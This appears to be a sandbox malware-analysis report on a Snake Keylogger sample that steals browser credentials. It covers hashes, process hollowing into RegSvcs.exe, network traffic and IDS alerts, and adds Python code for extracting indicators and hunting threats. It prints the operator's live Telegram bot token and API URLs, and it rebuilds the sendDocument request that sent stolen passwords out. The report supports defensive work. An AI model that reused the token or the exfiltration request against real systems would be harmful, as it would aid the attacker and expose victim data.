File name:

0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac

Full analysis: https://app.any.run/tasks/7f79c2ab-a86a-4d25-ba18-5e90377031c5
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and records every keystroke made on the device. This lets attackers collect victims' personal information, including online banking credentials and private conversations. The most common infection vector is a phishing email or link. Keylogging is also often built into remote access trojans as part of a broader set of malicious tools.

Analysis date: January 10, 2025, 23:38:25
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
snake
keylogger
stealer
telegram
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

5525E92284B32082E959D9D4F58F44D6

SHA1:

E28870B31D2FC0B1C1CED9BD4102B9C0BA2A13D7

SHA256:

0B7718C1C06EC823438B84C44B1D0CCEDFCD24F73AAD0B83E63D7E20924796AC

SSDEEP:

49152:sHlGAXWQkC2R/QORBt7QjFtmcaTH/vU4do9Pcjq1GvXB1sgPR8N32+Rr181vWDZx:dAGQX21RBt7QjTmcaTH/vU4do9Pcjq1n

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may have been distorted by analyst actions and is provided as is; ANY.RUN does not guarantee that the content is malicious or safe.
  • MALICIOUS
    • Actions look like stealing of personal data
      • RegSvcs.exe (PID: 3560)
    • Steals credentials from Web Browsers
      • RegSvcs.exe (PID: 3560)
    • SNAKEKEYLOGGER has been detected (SURICATA)
      • RegSvcs.exe (PID: 3560)
  • SUSPICIOUS
    • Checks for external IP
      • svchost.exe (PID: 2192)
      • RegSvcs.exe (PID: 3560)
    • The process checks whether antivirus software is installed
      • RegSvcs.exe (PID: 3560)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)
      • RegSvcs.exe (PID: 3560)
    • Possible usage of Discord/Telegram API has been detected (YARA)
      • RegSvcs.exe (PID: 3560)
  • INFO
    • Reads mouse settings
      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)
    • Reads the computer name
      • RegSvcs.exe (PID: 3560)
    • Checks supported languages
      • RegSvcs.exe (PID: 3560)
      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)
    • Creates files in a temporary directory
      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)
    • The sample was compiled with English language support
      • 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (PID: 5200)
    • Disables trace logs
      • RegSvcs.exe (PID: 3560)
    • Checks proxy server information
      • RegSvcs.exe (PID: 3560)
    • Reads the machine GUID from the registry
      • RegSvcs.exe (PID: 3560)
    • Reads the software policy settings
      • RegSvcs.exe (PID: 3560)
    • Attempting to use instant messaging service
      • svchost.exe (PID: 2192)
      • RegSvcs.exe (PID: 3560)

ims-api

(PID) Process: (3560) RegSvcs.exe
Telegram-Tokens (1): 7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
Telegram-Info-Links for token 7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg:
Get info about bot: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getMe
Get incoming updates: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getUpdates
Get webhook: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/getWebhookInfo
Delete webhook: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/deleteWebhook
Drop incoming updates: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Request 1
Token: 7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-Point: sendDocument
Args: chat_id (1): 5839829477; caption (1): admin / Passwords / 181.214.173.66
Request 2
Token: 7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-Point: sendDocument
Args: chat_id (1): 5839829477; caption (1): admin / Passwords / 181.214.173.66
Request headers captured with this caption: HTTP/1.1; Content-Type: multipart/form-data; boundary================8dd31cfeae47581; Host: api.telegram.org; Content-Length: 1097; Connection: Keep-Alive
Request 3
Token: 7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg
End-Point: sendDocument
Args: chat_id (1): 5839829477; caption (1): admin / Passwords / 181.214.173.66
Telegram-Responses
ok: true
result:
  message_id: 95528
  from:
    id: 7708662779
    is_bot: true
    first_name: NOVA
    username: Skullsnovabot
  chat:
    id: 5839829477
    first_name: Makwanda
    last_name: Skulls
    username: Big4m
    type: private
  date: 1736552322
  document:
    file_name: Userdata.txt
    mime_type: text/plain
    file_id: BQACAgQAAxkDAAEBdShnga-C-cdRKZYmPa5tjJE28ZeQOgACjxgAAlxqEVDrd-xHruSzkzYE
    file_unique_id: AgADjxgAAlxqEVA
    file_size: 902
  caption: admin / Passwords / 181.214.173.66
  caption_entities:
    offset: 20
    length: 14
    type: url
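The exchange above is the sample's exfiltration channel: one Telegram Bot API sendDocument call per stolen data set, with the operator's chat_id, and a caption of the form "victim user / data category / victim external IP" (the IP the sample looked up via checkip.dyndns.org, which is what the "Possible sending an external IP address to Telegram" alert keys on). Telegram's JSON echo identifies both the bot (Skullsnovabot) and the receiving account (Big4m), and its caption_entities field marks the IP as a url entity, which gives an independent cross-check when parsing captured traffic. Note that the getMe/getUpdates/deleteWebhook links ANY.RUN lists are queries against the attacker's own bot, and deleteWebhook?drop_pending_updates=true is destructive; use them only under your organisation's rules of engagement. The parser below is an added example written for this page, not ANY.RUN's ims-api extractor; the raw request and response are rebuilt from the fields above, and the boundary string, the Content-Length and the placeholder Userdata.txt body are constructed assumptions.

```python
import json
import re
from datetime import datetime, timezone
from typing import Optional

# Values taken from the report: bot token, caption, chat_id, file name.
TOKEN = "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg"
CAPTION = "admin / Passwords / 181.214.173.66"
# Constructed: the report shows 'boundary================8dd31cfeae47581'; the exact
# run of '=' does not matter because the parser reads it back from the header.
BOUNDARY = "=" * 15 + "8dd31cfeae47581"
# Constructed: the real 902-byte Userdata.txt is not reproduced in the report.
DOC_BODY = b"CONSTRUCTED PLACEHOLDER - stolen credentials not included\r\n"


def _part(name: str, data: bytes, filename: Optional[str] = None) -> bytes:
    """Build one multipart/form-data part the way a .NET uploader would."""
    disp = f'form-data; name="{name}"'
    extra = b""
    if filename:
        disp += f'; filename="{filename}"'
        extra = b"Content-Type: text/plain\r\n"
    return (f"--{BOUNDARY}\r\nContent-Disposition: {disp}\r\n".encode()
            + extra + b"\r\n" + data + b"\r\n")


BODY = (_part("chat_id", b"5839829477")
        + _part("caption", CAPTION.encode())
        + _part("document", DOC_BODY, "Userdata.txt")
        + f"--{BOUNDARY}--\r\n".encode())

RAW_REQUEST = (f"POST /bot{TOKEN}/sendDocument HTTP/1.1\r\n"
               f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
               "Host: api.telegram.org\r\n"
               f"Content-Length: {len(BODY)}\r\n"
               "Connection: Keep-Alive\r\n\r\n").encode() + BODY

# Telegram's reply, rebuilt from the report's Telegram-Responses block.
RESPONSE_JSON = json.dumps({
    "ok": True,
    "result": {
        "message_id": 95528,
        "from": {"id": 7708662779, "is_bot": True, "first_name": "NOVA",
                 "username": "Skullsnovabot"},
        "chat": {"id": 5839829477, "first_name": "Makwanda", "last_name": "Skulls",
                 "username": "Big4m", "type": "private"},
        "date": 1736552322,
        "document": {"file_name": "Userdata.txt", "mime_type": "text/plain",
                     "file_id": "BQACAgQAAxkDAAEBdShnga-C-cdRKZYmPa5tjJE28ZeQOgACjxgAAlxqEVDrd-xHruSzkzYE",
                     "file_unique_id": "AgADjxgAAlxqEVA", "file_size": 902},
        "caption": CAPTION,
        "caption_entities": [{"offset": 20, "length": 14, "type": "url"}],
    },
})

# Bot tokens are '<numeric bot id>:<35 token characters>'.
REQUEST_LINE_RE = re.compile(r"^POST /bot(?P<token>\d+:[A-Za-z0-9_-]{35})/(?P<method>\w+) HTTP/")
BOUNDARY_RE = re.compile(r'boundary="?([^";\r\n]+)"?')
# Caption layout seen in the report: '<victim user> / <data category> / <victim external IP>'.
CAPTION_RE = re.compile(r"^(?P<user>.+?) / (?P<category>.+?) / (?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: {field name: (filename or None, data)}."""
    fields = {}
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing delimiter reached
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]                        # CRLF that precedes the next delimiter
        name = re.search(rb'name="([^"]+)"', head).group(1).decode()
        fname = re.search(rb'filename="([^"]+)"', head)
        fields[name] = (fname.group(1).decode() if fname else None, data)
    return fields


def extract_iocs(raw_request: bytes, response_json: str) -> dict:
    """Pull token, chat, victim identity and file details out of one sendDocument
    exchange, cross-checking the IP against Telegram's own 'url' caption entity."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    headers = head.decode("latin-1")
    req = REQUEST_LINE_RE.match(headers)
    fields = parse_multipart(body, BOUNDARY_RE.search(headers).group(1))
    caption = fields["caption"][1].decode()
    cap = CAPTION_RE.match(caption)
    result = json.loads(response_json).get("result", {})
    url_entities = [caption[e["offset"]:e["offset"] + e["length"]]
                    for e in result.get("caption_entities", []) if e.get("type") == "url"]
    return {
        "bot_token": req["token"],
        "bot_id": int(req["token"].split(":")[0]),
        "method": req["method"],
        "chat_id": int(fields["chat_id"][1].decode()),
        "victim_user": cap["user"],
        "category": cap["category"],
        "victim_external_ip": cap["ip"],
        "ip_confirmed_by_entity": cap["ip"] in url_entities,
        "document": fields["document"][0],
        "bot_username": result.get("from", {}).get("username"),
        "receiver_username": result.get("chat", {}).get("username"),
        "reported_size": result.get("document", {}).get("file_size"),
        "sent_at": datetime.fromtimestamp(result["date"], tz=timezone.utc).isoformat(),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(RAW_REQUEST, RESPONSE_JSON).items():
        print(f"{key:24} {value}")
```

The response's date field (1736552322) decodes to 2025-01-10 23:38:42 UTC, seventeen seconds after the analysis start time at the top of the report, which is a useful sanity check that the upload happened inside this run rather than being a replayed capture.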
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

CharacterSet: Unicode
LanguageCode: English (British)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 0.0.0.0
FileVersionNumber: 0.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x27dcd
UninitializedDataSize: -
InitializedDataSize: 374272
CodeSize: 581120
LinkerVersion: 12
PEType: PE32
ImageFileCharacteristics: Executable, Large address aware, 32-bit
TimeStamp: 2024:12:18 23:15:33+00:00
MachineType: Intel 386 or later, and compatibles
No data.
Total processes
130
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Nodes: start; 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe (no specs); regsvcs.exe (#SNAKEKEYLOGGER); svchost.exe

Process information

PID:
5200
CMD:
"C:\Users\admin\AppData\Local\Temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe"
Path:
C:\Users\admin\AppData\Local\Temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe
Parent process:
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
PID:
3560
CMD:
"C:\Users\admin\AppData\Local\Temp\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Parent process:
0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID:
2192
CMD:
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path:
C:\Windows\System32\svchost.exe
Parent process:
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
1 060
Read events
1 046
Write events
14
Delete events
0

Modification events

(PID) Process: (3560) RegSvcs.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
  write EnableFileTracing = 0
  write EnableAutoFileTracing = 0
  write EnableConsoleTracing = 0
  write FileTracingMask = (value not captured)
  write ConsoleTracingMask = (value not captured)
  write MaxFileSize = 1048576
  write FileDirectory = %windir%\tracing
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
  write EnableFileTracing = 0
  write EnableAutoFileTracing = 0
  write EnableConsoleTracing = 0
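Two artifacts in the process and registry sections above are worth turning into hunts. First, PID 3560 runs as C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe but carries the dropper's own path as its command line, which is the classic tell of a suspended .NET utility being hollowed and used as a host for the payload. Second, the Tracing\RegSvcs_RASAPI32 and RegSvcs_RASMANCS writes that the report labels "Disables trace logs" are populated with default values by the Windows RAS library the first time a process loads it; on their own they are weak evidence of anti-forensics, but the process name embedded in the key records that RegSvcs.exe, a COM+ registration utility with no reason to use the networking stack, did exactly that. The hunt below is an added example written for this page, not ANY.RUN logic; it runs over constructed Sysmon-style records (event ID 1 is process creation, ID 13 is a registry value set), and the field names, the list of .NET host binaries and the benign control records are assumptions.

```python
import ntpath
import re

# Paths from the report's Process information section.
SAMPLE = (r"C:\Users\admin\AppData\Local\Temp"
          r"\0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe")
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# .NET Framework utilities routinely abused as injection/hollowing hosts (assumed list).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "applaunch.exe"}
# Tracing\<process>_RASAPI32 / _RASMANCS: <process> is the image that loaded the RAS library.
TRACING_RE = re.compile(r"\\Microsoft\\Tracing\\(?P<proc>[^\\]+)_(?:RASAPI32|RASMANCS)\\", re.I)

# Constructed Sysmon-style records (id 1 = process create, id 13 = registry value set).
EVENTS = [
    {"id": 1, "pid": 5200, "image": SAMPLE, "cmdline": f'"{SAMPLE}"',
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 3560, "image": REGSVCS, "cmdline": f'"{SAMPLE}"', "parent": SAMPLE},
    {"id": 1, "pid": 2192, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache",
     "parent": r"C:\Windows\System32\services.exe"},
    {"id": 13, "pid": 3560, "image": REGSVCS,
     "target": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32\EnableFileTracing"},
    # Constructed benign control: any ordinary network client gets the same kind of key.
    {"id": 13, "pid": 7000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Tracing\firefox_RASAPI32\EnableFileTracing"},
]


def cmdline_executable(cmdline: str) -> str:
    """First token of a Windows command line, honouring a leading quoted path."""
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(None, 1)[0]


def is_user_writable(path: str) -> bool:
    """Crude 'could an unprivileged user have written this' test on the path."""
    low = path.lower()
    return "\\users\\" in low or "\\temp\\" in low or "\\programdata\\" in low


def hunt(events) -> list:
    """Return (pid, rule, detail) for every record matching one of the three tells."""
    findings = []
    for e in events:
        image = ntpath.basename(e["image"]).lower()
        if e["id"] == 1:
            claimed = ntpath.basename(cmdline_executable(e["cmdline"])).lower()
            if claimed != image:
                # Image on disk differs from what the command line says is running.
                findings.append((e["pid"], "cmdline_image_mismatch", f"{image} started as {claimed}"))
            if image in DOTNET_HOSTS and is_user_writable(e["parent"]):
                findings.append((e["pid"], "dotnet_host_from_user_writable_parent", e["parent"]))
        elif e["id"] == 13:
            m = TRACING_RE.search(e["target"])
            if m and m["proc"].lower() + ".exe" in DOTNET_HOSTS:
                # The RAS tracing key names the process that touched the network stack.
                findings.append((e["pid"], "dotnet_host_used_network_stack", m["proc"]))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in hunt(EVENTS):
        print(f"PID {pid}: {rule} ({detail})")
```

The command-line check is the most portable of the three: it needs only the process-creation event and fires regardless of which host binary the loader picked, whereas the other two depend on keeping the list of abused .NET utilities current.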
Executable files
0
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID | Process | Filename | Type
5200 | 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe | C:\Users\admin\AppData\Local\Temp\aut6805.tmp | binary
  MD5: BF7D4A61CFFF11CE70DAE67EA27A26ED
  SHA256: 7CA9EE581D9322AA5CFC49FA8D65F191AC56A02BA9326D4A87DF6E43FD50D7B8
5200 | 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe | C:\Users\admin\AppData\Local\Temp\aut665E.tmp | binary
  MD5: 3455AC91B92892468715125CB95827CE
  SHA256: 2FFEA27C3E08D14745CDC53E0BFEC729170029728C49AC6936874BD0C6A355B6
5200 | 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe | C:\Users\admin\AppData\Local\Temp\Idonna | text
  MD5: 1837FB67828BB51BED9520F7BEA06B8F
  SHA256: CA493C35B1FFDF8EE3D1548611CCD4FCA8D3D75F02B178CFFC1704CDD3F0B683
5200 | 0b7718c1c06ec823438b84c44b1d0ccedfcd24f73aad0b83e63d7e20924796ac.exe | C:\Users\admin\AppData\Local\Temp\anaboly | binary
  MD5: 32958FBA6DD1673ADB2A6C59C01EA5F6
  SHA256: EEA901FA762BCD34921B5BF646C0F23B4C7F99D9A880C53EC91881271D89D535
HTTP(S) requests
12
TCP/UDP connections
35
DNS requests
20
Threats
12

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation (Type and Size columns not captured)
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5488 | svchost.exe | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5488 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
5236 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
3560 | RegSvcs.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | malicious
5236 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
3560 | RegSvcs.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | malicious
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
3560 | RegSvcs.exe | GET | 200 | 132.226.247.73:80 | http://checkip.dyndns.org/ | unknown | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
4 | System | 192.168.100.255:138 | - | - | - | unknown
4712 | MoUsoCoreWorker.exe | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
5488 | svchost.exe | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5488 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5064 | SearchApp.exe | 104.126.37.179:443 | www.bing.com | Akamai International B.V. | DE | unknown
- | - | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown
3560 | RegSvcs.exe | 132.226.247.73:80 | checkip.dyndns.org | ORACLE-BMC-31898 | BR | unknown
3560 | RegSvcs.exe | 104.21.32.1:443 | reallyfreegeoip.org | CLOUDFLARENET | - | unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
unknown
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
unknown
www.microsoft.com
  • 184.30.21.171
unknown
google.com
  • 142.250.186.142
unknown
www.bing.com
  • 104.126.37.179
  • 104.126.37.144
  • 104.126.37.171
  • 104.126.37.129
  • 104.126.37.139
  • 104.126.37.170
  • 104.126.37.128
  • 104.126.37.155
  • 104.126.37.185
unknown
ocsp.digicert.com
  • 192.229.221.95
unknown
checkip.dyndns.org
  • 132.226.247.73
  • 132.226.8.169
  • 193.122.130.0
  • 158.101.44.242
  • 193.122.6.168
unknown
reallyfreegeoip.org
  • 104.21.32.1
  • 104.21.64.1
  • 104.21.48.1
  • 104.21.96.1
  • 104.21.16.1
  • 104.21.112.1
  • 104.21.80.1
unknown
login.live.com
  • 40.126.32.72
  • 40.126.32.68
  • 40.126.32.140
  • 40.126.32.133
  • 20.190.160.22
  • 40.126.32.134
  • 20.190.160.14
  • 20.190.160.17
unknown
api.telegram.org
  • 149.154.167.220
unknown

Threats

Class | Message (PID and Process columns not captured)
Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Query (checkip .dyndns .org)
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
Misc activity | ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
Misc activity | ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
Misc activity | SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
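Every alert in this table is individually low severity: external-IP lookups and Telegram API traffic are both common in benign software. They become a high-confidence detection only when the same process does both in sequence, which is the "Snake/Matiex Keylogger Style" pattern the ET signature names. One caveat when correlating: the DNS-based alerts are attributed to svchost.exe -s Dnscache (PID 2192 here) because the Windows DNS client resolves names on behalf of every process, which is why the Dnscache service shows up under "Checks for external IP" and "Attempting to use instant messaging service" in the indicators list. The correlation below is an added example written for this page, not ANY.RUN or Emerging Threats logic; it runs over events constructed from the report's HTTP, connection and DNS tables, and the timestamps, the (seconds, pid, process, kind, host) schema, the domain lists and the two control processes are assumptions.

```python
from collections import defaultdict

# Assumed watch lists; extend with whatever lookup services and messenger APIs your telemetry sees.
IP_LOOKUP_DOMAINS = {"checkip.dyndns.org", "reallyfreegeoip.org", "api.ipify.org", "icanhazip.com"}
MESSENGER_API_DOMAINS = {"api.telegram.org", "discord.com", "discordapp.com"}
WINDOW_SECONDS = 300

# Constructed from the report: (seconds, pid, process, kind, host); kind is dns | http_host | tls_sni.
EVENTS = [
    (0, 2192, "svchost.exe",         "dns",       "checkip.dyndns.org"),   # Dnscache resolves for others
    (1, 3560, "RegSvcs.exe",         "http_host", "checkip.dyndns.org"),
    (2, 2192, "svchost.exe",         "dns",       "reallyfreegeoip.org"),
    (3, 3560, "RegSvcs.exe",         "tls_sni",   "reallyfreegeoip.org"),
    (4, 2192, "svchost.exe",         "dns",       "api.telegram.org"),
    (5, 3560, "RegSvcs.exe",         "tls_sni",   "api.telegram.org"),
    (6, 5488, "svchost.exe",         "http_host", "crl.microsoft.com"),
    (7, 4712, "MoUsoCoreWorker.exe", "http_host", "www.microsoft.com"),
    # Constructed controls: a lookup with no exfil channel, and a Telegram client with no lookup.
    (8, 9001, "monitor.exe",         "http_host", "api.ipify.org"),
    (9, 9002, "bot.exe",             "tls_sni",   "api.telegram.org"),
]


def correlate(events, window=WINDOW_SECONDS):
    """One finding per PID whose own HTTP Host / TLS SNI traffic shows an external-IP
    lookup followed within `window` seconds by a messenger-API connection.  DNS events
    are ignored on purpose: on Windows they belong to the Dnscache service process,
    not to the process that asked for the name."""
    by_pid = defaultdict(list)
    for ts, pid, proc, kind, host in sorted(events):
        if kind in ("http_host", "tls_sni"):
            by_pid[pid].append((ts, proc, host.lower()))
    findings = []
    for pid, evs in by_pid.items():
        lookups = [(ts, h) for ts, _, h in evs if h in IP_LOOKUP_DOMAINS]
        exfil = [(ts, h) for ts, _, h in evs if h in MESSENGER_API_DOMAINS]
        for lts, lhost in lookups:
            hit = next(((ets, eh) for ets, eh in exfil if 0 <= ets - lts <= window), None)
            if hit:
                findings.append({"pid": pid, "process": evs[0][1], "lookup": lhost,
                                 "exfil": hit[1], "delta_s": hit[0] - lts})
                break                      # report each process once
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"PID {f['pid']} ({f['process']}): {f['lookup']} -> {f['exfil']} after {f['delta_s']}s")
```

With the report's ordering the sample is caught on its first lookup (checkip.dyndns.org, four seconds before the Telegram SNI); narrowing the window to two seconds still catches it on the reallyfreegeoip.org lookup, while neither control process fires.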
No debug info